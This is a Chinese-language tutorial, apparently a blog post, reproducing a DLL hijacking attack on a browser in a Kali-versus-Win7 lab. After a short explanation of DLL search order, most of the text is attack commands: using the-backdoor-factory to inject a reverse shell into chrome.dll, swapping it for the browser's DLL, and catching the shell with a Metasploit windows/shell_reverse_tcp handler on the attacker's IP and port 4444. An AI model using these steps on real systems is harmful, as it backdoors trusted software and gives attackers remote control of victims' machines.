DLL劫持 漏洞復(fù)現(xiàn)
DLL(Dynamic Link Library)文件為動態(tài)鏈接庫文件,又稱"應(yīng)用程序拓展",是軟件文件類型。在Windows中,許多應(yīng)用程序并不是一個完整的可執(zhí)行文件,它們被分割成一些相對獨立的動態(tài)鏈接庫,即DLL文件,放置于系統(tǒng)中。當(dāng)我們執(zhí)行某一個程序時,相應(yīng)的DLL文件就會被調(diào)用。一個應(yīng)用程序可使用多個DLL文件,一個DLL文件也可能被不同的應(yīng)用程序使用,這樣的DLL文件被稱為共享DLL文件。
如果在進程嘗試加載一個DLL時沒有指定DLL的絕對路徑,那么Windows會嘗試去按照順序搜索這些特定目錄時下查找這個DLL,只要黑客能夠?qū)阂獾腄LL放在優(yōu)先于正常DLL所在的目錄,就能夠欺騙系統(tǒng)優(yōu)先加載惡意DLL,來實現(xiàn)"劫持"
例如:對于文件系統(tǒng),如doc文檔打開會被應(yīng)用程序office打開,而office運行的時候會加載系統(tǒng)的一個dll文件,如果我們將用惡意的dll來替換系統(tǒng)的dll文件,就是將DLL和doc文檔放在一起,運行的時候就會在當(dāng)前目錄中找到DLL,從而優(yōu)先系統(tǒng)目錄下的DLL而被執(zhí)行。
SRC也收這類DLL劫持漏洞的
下面是某瀏覽器的DLL劫持
攻擊機 Kali 192.168.123.182
靶機? ?Win7 192.168.123.243
需要用到?procexp64(線程分析工具)
以及某瀏覽器,哈哈哈 表哥們不要認真哈。

先找到某瀏覽,然后查看那些DLL文件跟瀏覽器一起啟動的


將chrome.dll?復(fù)制到 kali 里面
攻擊機 Kali 執(zhí)行
git clone https://github.com/secretsquirrel/the-backdoor-factory #下載T-B-Fpip?install?capstone?#cd到T-B-F目錄安裝capstone庫./backdoor.py -f /root/tbf/the-backdoor-factory/chrome.dll #在tbf里面找到backdoor.py腳本運行

掃描注入點
./backdoor.py -f /root/tbf/the-backdoor-factory/chrome.dll -s這里一共掃描出了83個注入點 我們只要隨機選擇一個注入點就好了
這里選擇注入點輸入注入點前面的數(shù)字回車就可以

選擇完后會自動生成一個帶shell的dll文件

進入這個文件夾內(nèi) 反彈shell的dll文件就在這個文件夾內(nèi)


將Chrome.dll文件復(fù)制到過去替換原來文件
打開msf
msfconsoleuse?multi/handlerset payload windows/shell_reverse_tcpset?LPORT?4444set LHOST 192.168.123.182exploit


運行


可以看到成功上線。
